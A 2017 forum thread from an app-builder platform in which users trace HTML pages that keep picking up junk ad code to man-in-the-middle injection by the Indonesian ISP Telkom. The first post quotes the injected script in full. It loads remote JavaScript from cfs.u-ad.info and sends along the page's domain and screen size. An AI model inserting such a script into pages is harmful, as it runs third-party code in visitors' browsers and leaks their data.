Plans & Prices My Applications Cloud Resources Profile Support Login Sign Up

Editable "html" pagetype produces injectable ad codes every edit... Is it just me?    
This topic is assigned to Victor Robu

Oct 14, 2017 06:16 AM
Greetings,

First of all, I cannot report this to SC because I am with a whitelabel provider.

I am based in Indonesia. I don't have knowledge over this, but here's the thing.

If I create blank-based html pages with menus and stuff and then save it. Everything works normally.

But from time to time when I need to edit the html pages (add more content, menus, etc), I see injected advertisement codes like this:

1<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnoaGcauRpoNU291nYCLVCfweke%2bnTDKyEm​vAMpeP9BTlPmKPi9zFU4Hd059p8DIKgW6VdGD5eW2h5owqqy%2bvRvswUBfN54P7WQqJI6​VBVidbKJQV3cl7k%2bjovf%2bebeUsgBXDLBSvcMw%2fbKIVcu3m20%2bg4FUUzrlCZEgQ​dQSKPtEeiFOtJ%2bAAb4eG8v41sZLEk%2fiNkmsOvdRjce%2fON2uRaSWFq0kxodsGotgl​ghBMawmrBQ8fimLU96StISR8DNwwft9WWJxE0GzJw1Ec7DhfpHmuUG4ahrykdj%2bpGa56​gf1wgwzHuhLRygiEi6PMuIGy80QXIMpD7rGLoNbCcKWFtXW7cfnomT6WISftqYBx2uEuA1​BvuWDPZQuVnDPqckjaXJyGTj%2f6xAIkjw0TjCZv55z6veUcgCAGB5EgCcrM%2fZPli4ay​B3YTG1HITAEOn9ZcQz7wilWqPgmbN6cihFvsKztroFDApbujbxHmwoeeU1O%2f2DEofum3​sAxuyt%2fM6EXl6byWzpG81b8%2fFZ87FEMQQ26m%2f7rbrKCoNplw4h9K%2baJJeqqa1z​UXHtoip%2bA85%2bQQ1Hvt4lcjNRm4uarai6XOmww%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>

I have checked, no virus on my browser or computer. I even tried these steps:
- create new app from builder using a brand new laptop in chrome browser.
- download and install previewer app on brand new iphone and a brand new android phone.
- preview the app html page within those app previewer.
- went back to app builder (refreshed). ad codes injected.

Worse, the ad code above sometimes multiply many times over and I end up with html pages full of garbage codes which I have to erase periodically. I don't get it, why does this happen?

The worst? Here's a complain from one of my app client whom she mentions an explicit ads appeared inside the app which clearly isn't coming from admob (because I disabled ads from the app):


Any workaround to this would be great. At the moment, I resorted to creating mobile lightweight wordpress pages as menus, because the ad codes cannot be auto-injected into 'mobile' type page.

Cheers...


Oct 16, 2017 08:09 AM
No, It is not just you. I have noticed the same thing. It is not a virus but I have no idea why this happens. All I know is it has something to do with <script></script> and java *.js

I don't have a solution for that all I do is I pay so much attention when changing some stuff on an .HTML so than I edit the page with the "Edit HTML code in separate window" and delete the junk code manually.

I would also like to know what can I do so it doesn't bug like that


Oct 16, 2017 10:30 AM
I had this problem too with my WordPress website editor. I found that this code is added by the Indonesian ISP Telkom. Many people have this problem among different HTML editors, especially with websites:

https://www.sadev.co.za/content/telkom-using-man-middle-attack-chan...

https://www.lowendtalk.com/discussion/39263/indonesian-isp-injectin...

https://gist.github.com/donnykurnia/2356dad4119ce85d18d18708914c60e3

I switched the internet provider and do not have this problem anymore.


Oct 18, 2017 02:19 AM
Hi guys,

Thanks for clarifying this. After extensive research, I found out it is true to be a problem with Telkom ISP, especially with "Indihome" ISP which has been widely adapted by lots of biz in my locale.

Not just on my apps, but on regular websites too. It has become a problem that cannot be fixed, because obviously we cannot tell phone users to do technical things like install adblocker, etc.

Here's the source: https://gist.github.com/donnykurnia/2356dad4119ce85d18d18​708914c60e3

Shame on you, Telkom!

    1   
You must login to post messages. Click here to log in.